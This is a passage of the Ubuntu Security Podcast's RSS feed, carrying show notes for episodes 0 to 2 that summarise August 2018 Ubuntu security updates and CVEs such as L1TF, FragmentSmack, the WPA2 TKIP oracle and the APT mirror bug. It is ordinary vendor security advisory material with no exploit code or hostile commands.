          <guid>https://people.canonical.com/~amurray/USP/USP_E002.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 2</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        L1TF kernel regressions, WPA2 key recovery, mirror fail and more!
        
        ]]></itunes:subtitle>
        <itunes:summary>L1TF kernel regressions, WPA2 key recovery, mirror fail and more!</itunes:summary>
        <description>L1TF kernel regressions, WPA2 key recovery, mirror fail and more!</description>
        <googleplay:description>L1TF kernel regressions, WPA2 key recovery, mirror fail and more!</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>83 unique CVEs addressed across the supported Ubuntu releases.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<h3 id="usn-3742-3-linux-kernel--trusty-hwe--regressions">[<a href="https://usn.ubuntu.com/3742-3/">USN-3742-3</a>] Linux kernel (Trusty HWE) regressions</h3>
<ul>
<li>Security team issues USNs for package updates caused by regressions in previous security updates</li>
<li>Fix for regressions caused by the original kernel update for L1TF</li>
<li>Could cause Java applications to fail to start and possible kernel panics on
boot for some hardware configurations</li>
</ul>
<h3 id="usn-3745-1-wpa-supplicant-and-hostapd-vulnerability">[<a href="https://usn.ubuntu.com/3745-1/">USN-3745-1</a>] wpa_supplicant and hostapd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14526">CVE-2018-14526</a></li>
</ul>
</li>
<li>Researchers analysed WPA2 4-way handshake via symbolic execution to find weaknesses
<ul>
<li>Found a number of issues including a decryption oracle</li>
<li>In this case, the would decrypt but not authenticate frame and then could allow recovery of the group key via a timing side-channel</li>
<li>In theory, allows an unauthenticated attacker to recover WPA2 group key via frame manipulation when used with TKIP
<ul>
<li>NOTE: is not advised to use TKIP in practice anyway (should use WPA2/CCMP) and so should have limited applicability</li>
</ul>
</li>
<li>In practice, due to large number of attempts needed to recover the full key, this is impractical (especially given that the group key is changed periodically)</li>
</ul>
</li>
<li><a href="https://w1.fi/security/2018-1/unauthenticated-eapol-key-decryption.txt">https://w1.fi/security/2018-1/unauthenticated-eapol-key-decryption.txt</a></li>
<li><a href="https://papers.mathyvanhoef.com/woot2018.pdf">https://papers.mathyvanhoef.com/woot2018.pdf</a></li>
</ul>
<h3 id="usn-3746-1-apt-vulnerability">[<a href="https://usn.ubuntu.com/3746-1/">USN-3746-1</a>] APT vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-0501">CVE-2018-0501</a></li>
</ul>
</li>
<li>Dubbed &ldquo;mirror fail&rdquo; by the author and even a website - <a href="https://mirror.fail/">https://mirror.fail/</a></li>
<li>mirror protocol in apt allows to specify a list of mirrors to try rather than just a single mirror in source.list
<ul>
<li>not enabled by default</li>
</ul>
</li>
<li>in APT 1.6 this was reworked and a bug introduced
<ul>
<li>on fallback from one mirror to the next, the previous mirrors InRelease file would be used without checking the one from the new mirror</li>
<li>hence failing to authenticate the one from the new mirror</li>
<li>could potentially allow installation of untrusted packages BUT would need at least two mirrors to be compromised AND for the user to have setup use of multiple mirrors in the first place</li>
</ul>
</li>
</ul>
<h3 id="usn-3748-1-base-files-vulnerability">[<a href="https://usn.ubuntu.com/3748-1/">USN-3748-1</a>] base-files vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6557">CVE-2018-6557</a></li>
</ul>
</li>
<li>Vulnerability in the motd update script via insecure use of temporary files
<ul>
<li>Could allow DoS or privelege escalation if user has turned off kernel symlink restrictions</li>
</ul>
</li>
</ul>
<h3 id="usn-3751-1-spice-vulnerability">[<a href="https://usn.ubuntu.com/3751-1/">USN-3751-1</a>] Spice vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10873">CVE-2018-10873</a></li>
</ul>
</li>
<li>Insufficient bounds checks could allow to crash a server OR client from an authenticated peer</li>
<li>Requires authentication</li>
</ul>
<h3 id="usn-3747-1-openjdk-10-vulnerabilities">[<a href="https://usn.ubuntu.com/3747-1/">USN-3747-1</a>] OpenJDK 10 vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-2972">CVE-2018-2972</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-2952">CVE-2018-2952</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-2826">CVE-2018-2826</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-2825">CVE-2018-2825</a></li>
</ul>
</li>
<li>Regular Java update to fix multiple vulnerabilities</li>
</ul>
<h3 id="usn-3749-1-spidermonkey-vulnerabilities">[<a href="https://usn.ubuntu.com/3749-1/">USN-3749-1</a>] Spidermonkey vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5188">CVE-2018-5188</a></li>
</ul>
</li>
<li>Regular Spidermonkey update to fix vulnerabilities</li>
</ul>
<h3 id="usn-3750-1-pango-vulnerability">[<a href="https://usn.ubuntu.com/3750-1/">USN-3750-1</a>] Pango vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15120">CVE-2018-15120</a></li>
</ul>
</li>
</ul>
<h3 id="kernel-packages-updated">Kernel packages updated</h3>
<h4 id="usn-3752-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3752-1/">USN-3752-1</a>] Linux kernel vulnerabilities</h4>
<ul>
<li>18 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000204">CVE-2018-1000204</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9415">CVE-2018-9415</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5814">CVE-2018-5814</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13406">CVE-2018-13406</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13405">CVE-2018-13405</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13094">CVE-2018-13094</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12904">CVE-2018-12904</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12233">CVE-2018-12233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12232">CVE-2018-12232</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11506">CVE-2018-11506</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11412">CVE-2018-11412</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1120">CVE-2018-1120</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1108">CVE-2018-1108</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1093">CVE-2018-1093</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10881">CVE-2018-10881</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10840">CVE-2018-10840</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10323">CVE-2018-10323</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000200">CVE-2018-1000200</a></li>
</ul>
</li>
</ul>
<h4 id="usn-3752-2-linux-kernel--hwe--vulnerabilities">[<a href="https://usn.ubuntu.com/3752-2/">USN-3752-2</a>] Linux kernel (HWE) vulnerabilities</h4>
<ul>
<li>18 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000204">CVE-2018-1000204</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9415">CVE-2018-9415</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5814">CVE-2018-5814</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13406">CVE-2018-13406</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13405">CVE-2018-13405</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13094">CVE-2018-13094</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12904">CVE-2018-12904</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12233">CVE-2018-12233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12232">CVE-2018-12232</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11506">CVE-2018-11506</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11412">CVE-2018-11412</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1120">CVE-2018-1120</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1108">CVE-2018-1108</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1093">CVE-2018-1093</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10881">CVE-2018-10881</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10840">CVE-2018-10840</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10323">CVE-2018-10323</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000200">CVE-2018-1000200</a></li>
</ul>
</li>
</ul>
<h4 id="usn-3753-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3753-1/">USN-3753-1</a>] Linux kernel vulnerabilities</h4>
<ul>
<li>11 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-13406">CVE-2018-13406</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13405">CVE-2018-13405</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13094">CVE-2018-13094</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12233">CVE-2018-12233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10881">CVE-2018-10881</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10882">CVE-2018-10882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10878">CVE-2018-10878</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10877">CVE-2018-10877</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10879">CVE-2018-10879</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10876">CVE-2018-10876</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13168">CVE-2017-13168</a></li>
</ul>
</li>
</ul>
<h4 id="usn-3753-2-linux-kernel--xenial-hwe--vulnerabilities">[<a href="https://usn.ubuntu.com/3753-2/">USN-3753-2</a>] Linux kernel (Xenial HWE) vulnerabilities</h4>
<ul>
<li>11 CVEs addressed in Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-13406">CVE-2018-13406</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13405">CVE-2018-13405</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13094">CVE-2018-13094</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12233">CVE-2018-12233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10881">CVE-2018-10881</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10882">CVE-2018-10882</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10878">CVE-2018-10878</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10877">CVE-2018-10877</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10879">CVE-2018-10879</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10876">CVE-2018-10876</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13168">CVE-2017-13168</a></li>
</ul>
</li>
</ul>
<h4 id="usn-3754-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3754-1/">USN-3754-1</a>] Linux kernel vulnerabilities</h4>
<ul>
<li>53 CVEs addressed in Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10021">CVE-2018-10021</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000204">CVE-2018-1000204</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-2671">CVE-2017-2671</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13406">CVE-2018-13406</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13405">CVE-2018-13405</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13094">CVE-2018-13094</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12233">CVE-2018-12233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10940">CVE-2018-10940</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1093">CVE-2018-1093</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1092">CVE-2018-1092</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10881">CVE-2018-10881</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10877">CVE-2018-10877</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10675">CVE-2018-10675</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10323">CVE-2018-10323</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10124">CVE-2018-10124</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10087">CVE-2018-10087</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9985">CVE-2017-9985</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9984">CVE-2017-9984</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8831">CVE-2017-8831</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7645">CVE-2017-7645</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7518">CVE-2017-7518</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6348">CVE-2017-6348</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6345">CVE-2017-6345</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5897">CVE-2017-5897</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5549">CVE-2017-5549</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-2584">CVE-2017-2584</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-2583">CVE-2017-2583</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18270">CVE-2017-18270</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18255">CVE-2017-18255</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17558">CVE-2017-17558</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16914">CVE-2017-16914</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16913">CVE-2017-16913</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16912">CVE-2017-16912</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16911">CVE-2017-16911</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16650">CVE-2017-16650</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16645">CVE-2017-16645</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16644">CVE-2017-16644</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16643">CVE-2017-16643</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16538">CVE-2017-16538</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16537">CVE-2017-16537</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16536">CVE-2017-16536</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16535">CVE-2017-16535</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16533">CVE-2017-16533</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16532">CVE-2017-16532</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16531">CVE-2017-16531</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16529">CVE-2017-16529</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16527">CVE-2017-16527</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16526">CVE-2017-16526</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15649">CVE-2017-15649</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14991">CVE-2017-14991</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11473">CVE-2017-11473</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11472">CVE-2017-11472</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10208">CVE-2016-10208</a></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-manager">Ubuntu Security Manager</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1278287">https://boards.greenhouse.io/canonical/jobs/1278287</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E002.mp3" length="7935502" type="audio/mpeg" /><itunes:duration>08:15</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 1
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-1/</link>
          <pubDate>Mon, 20 Aug 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E001.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 1</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        Another week, another speculative execution vulnerablity... and more!
        
        ]]></itunes:subtitle>
        <itunes:summary>Another week, another speculative execution vulnerablity... and more!</itunes:summary>
        <description>Another week, another speculative execution vulnerablity... and more!</description>
        <googleplay:description>Another week, another speculative execution vulnerablity... and more!</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<ul>
<li>Security fixes for 39 CVEs this week including L1TF and FragmentSmack</li>
</ul>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<h3 id="gdm--usn-3737-1----cve-2018-14424">GDM (<a href="https://usn.ubuntu.com/3737-1/">USN-3737-1</a>) (<a href="https://ubuntu.com/security/CVE-2018-14424">CVE-2018-14424</a>)</h3>
<ul>
<li>Found by Ubuntu Security Team member Chris Coulson during audit of gdm3 source code</li>
<li>Local user can exploit via DBus to crash GDM via use-after-free (create a transient display which is automatically cleaned up, then try to query info for the previously created display)</li>
<li>Bionic only so far</li>
</ul>
<h3 id="libarchive--usn-3736-1">libarchive (<a href="https://usn.ubuntu.com/3736-1/">USN-3736-1</a>)</h3>
<ul>
<li>6 CVEs addressed across Bionic, Xenial and Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-10209">CVE-2016-10209</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10349">CVE-2016-10349</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10350">CVE-2016-10350</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14166">CVE-2017-14166</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14501">CVE-2017-14501</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14503">CVE-2017-14503</a></li>
</ul>
</li>
<li>All local crashes / DoS / unspecified impact via specially crafted archives in various formats</li>
</ul>
<h3 id="samba--usn-3738-1">Samba (<a href="https://usn.ubuntu.com/3738-1/">USN-3738-1</a>)</h3>
<ul>
<li>4 CVEs addressed across Bionic, Xenial and Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10858">CVE-2018-10858</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10918">CVE-2018-10918</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10919">CVE-2018-10919</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1139">CVE-2018-1139</a></li>
</ul>
</li>
<li>Includes vulnerabilities in both the samba client and server
<ul>
<li>Likely to affect most Ubuntu users</li>
</ul>
</li>
</ul>
<h3 id="libxml2--usn-3739-1----usn-3739-2">libxml2 (<a href="https://usn.ubuntu.com/3739-1/">USN-3739-1</a>) (<a href="https://usn.ubuntu.com/3739-2/">USN-3739-2</a>)</h3>
<ul>
<li>XML parsing library used across lots of different software packages</li>
<li>5 CVEs fixed across releases for Bionic, Xenial and Trusty
<ul>
<li>2 CVEs fixed for Precise ESM</li>
<li><a href="https://ubuntu.com/security/CVE-2016-9318">CVE-2016-9318</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16932">CVE-2017-16932</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18258">CVE-2017-18258</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14404">CVE-2018-14404</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14567">CVE-2018-14567</a></li>
</ul>
</li>
<li>Includes information disclosure and DoS</li>
</ul>
<h3 id="l1tf-and-fragmentsmack-vulnerabilities-in-linux-kernel--usn-3740-1----usn-3740-2----usn-3741-1----usn-3741-2----usn-3742-1----usn-3742-2">L1TF and FragmentSmack vulnerabilities in Linux Kernel (<a href="https://usn.ubuntu.com/3740-1/">USN-3740-1</a>) (<a href="https://usn.ubuntu.com/3740-2/">USN-3740-2</a>) (<a href="https://usn.ubuntu.com/3741-1/">USN-3741-1</a>) (<a href="https://usn.ubuntu.com/3741-2/">USN-3741-2</a>) (<a href="https://usn.ubuntu.com/3742-1/">USN-3742-1</a>) (<a href="https://usn.ubuntu.com/3742-2/">USN-3742-2</a>)</h3>
<h4 id="l1tf--cve-2018-3620----cve-2018-3646">L1TF (<a href="https://ubuntu.com/security/CVE-2018-3620">CVE-2018-3620</a>) (<a href="https://ubuntu.com/security/CVE-2018-3646">CVE-2018-3646</a>)</h4>
<ul>
<li>Latest speculative execution cache side channel attack affecting Intel processors</li>
<li>Allows to access contents from L1 Data Cache via speculative execution,  can then be read by cache side channel</li>
<li>3 variants, SGX, SMM and VMM but only 2 affect Ubuntu</li>
<li>Processors access virtual addresses which need to be translated to physical addresses</li>
<li>Page Table Entries map from one to the other (contains metadata of page including offset and present bit)</li>
<li>Pages can be swapped in our out of memory (Present or not) - so if not present then need to do a full page table walk to look up physical address</li>
<li>But Intel processor will use offset value from PTE even on non-present pages <strong>speculatively</strong></li>
<li>For non-present pages, this value is usually junk so can essentially speculatively read arbitrary memory from L1D cache depending on PTE value</li>
<li>SGX doesn&rsquo;t affect Ubuntu since not used</li>
<li>SMM fixed via ensuring PTEs of not present pages always refer to non-cacheable memory and hence can&rsquo;t be used for this</li>
<li>VMM is trickier
<ul>
<li>VMs maintain their own PTEs so also need to ensure they are doing the right thing</li>
<li>OR if running untrusted VMs need to do a full L1D flush on switching from host to VM</li>
</ul>
</li>
<li>Made more trickier by Hyper Threading since sibling hyper-threads share the L1D cache</li>
<li>So if have different trust domains on sibling hyper-threads may have to disable HT in certain circumstances</li>
</ul>
<h4 id="fragmentsmack--cve-2018-5391">FragmentSmack (<a href="https://ubuntu.com/security/CVE-2018-5391">CVE-2018-5391</a>)</h4>
<ul>
<li>Last week was SegmentSmack in TCP fragment reassembly, this week is FragmentSmack</li>
<li>Similar but for IP fragmentation reassembly
<ul>
<li>Exploiting high algorithmic complexity of IP fragment reassembly code paths to cause DoS</li>
</ul>
</li>
</ul>
<h3 id="gnupg--usn-3733-2----cve-2017-7526">GnuPG (<a href="https://usn.ubuntu.com/3733-2/">USN-3733-2</a>) (<a href="https://ubuntu.com/security/CVE-2017-7526">CVE-2017-7526</a>)</h3>
<ul>
<li>Last week GnuPG was fixed for Xenial and Trusty for RSA cache side-channel issue</li>
<li>This is corresponding fix for Precise ESM</li>
</ul>
<h3 id="webkitgtk-plus-vulnerabilities--usn-3743-1">WebKitGTK+ vulnerabilities (<a href="https://usn.ubuntu.com/3743-1/">USN-3743-1</a>)</h3>
<ul>
<li>14 CVEs fixed in web content renderer used in many desktop apps
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12911">CVE-2018-12911</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4246">CVE-2018-4246</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4261">CVE-2018-4261</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4262">CVE-2018-4262</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4263">CVE-2018-4263</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4264">CVE-2018-4264</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4265">CVE-2018-4265</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4266">CVE-2018-4266</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4267">CVE-2018-4267</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4270">CVE-2018-4270</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4272">CVE-2018-4272</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4273">CVE-2018-4273</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4278">CVE-2018-4278</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4284">CVE-2018-4284</a></li>
</ul>
</li>
<li>Fixes for Bionic and Xenial</li>
</ul>
<h3 id="postgresql--usn-3744-1----cve-2018-10915----cve-2018-10925">PostgreSQL (<a href="https://usn.ubuntu.com/3744-1/">USN-3744-1</a>) (<a href="https://ubuntu.com/security/CVE-2018-10915">CVE-2018-10915</a>) (<a href="https://ubuntu.com/security/CVE-2018-10925">CVE-2018-10925</a>)</h3>
<ul>
<li>2 CVEs fixed in popular relational database across Bionic, Xenial and Trusty</li>
</ul>
<h3 id="procps-ng--usn-3658-3">procps-ng (<a href="https://usn.ubuntu.com/3658-3/">USN-3658-3</a>)</h3>
<ul>
<li>3 CVEs fixed in Precise ESM procps-ng package
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1122">CVE-2018-1122</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1123">CVE-2018-1123</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1125">CVE-2018-1125</a></li>
</ul>
</li>
</ul>
<h3 id="linux-kernel-livepatch--lsn-0042-1">Linux kernel livepatch (LSN-0042-1)</h3>
<ul>
<li>No Livepatch possible for L1TF so a LSN to advise to do an update and reboot</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-manger">Ubuntu Security Manger</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1278287">https://boards.greenhouse.io/canonical/jobs/1278287</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
<h2 id="special-thanks">Special thanks</h2>
<ul>
<li>Thanks to Emily Ratliff - a great manager of the team (and a good friend too)</li>
<li>We will miss you :)</li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E001.mp3" length="10133967" type="audio/mpeg" /><itunes:duration>10:33</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 0
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-0/</link>
          <pubDate>Tue, 14 Aug 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E000.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 0</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        The first ever episode of the Ubuntu Security Podcast!
        
        ]]></itunes:subtitle>
        <itunes:summary>The first ever episode of the Ubuntu Security Podcast!</itunes:summary>
        <description>The first ever episode of the Ubuntu Security Podcast!</description>
        <googleplay:description>The first ever episode of the Ubuntu Security Podcast!</googleplay:description>
        <content:encoded><![CDATA[<h2 id="introduction">Introduction</h2>
<h3 id="what-will-be-covered">What will be covered</h3>
<ul>
<li>Overview of latest security updates for Ubuntu</li>
<li>In depth discussion of trending CVEs</li>
<li>Other things the team has been up to</li>
</ul>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<h3 id="segmentsmack--cve-2018-5390----usn-3732-1">SegmentSmack (<a href="http://people.canonical.com/~ubuntu-security/cve/CVE-2018-5390">CVE-2018-5390</a>) (<a href="https://usn.ubuntu.com/3732-1/">USN-3732-1</a>)</h3>
<ul>
<li>DoS via expensive algorithmic computation in TCP stream reassembly</li>
<li>Requires attacker to have an existing TCP session</li>
<li>Affecting kernel &gt;= 4.9</li>
<li>Fixed in Bionic and Xenial for HWE</li>
<li>No known exploits in the wild</li>
</ul>
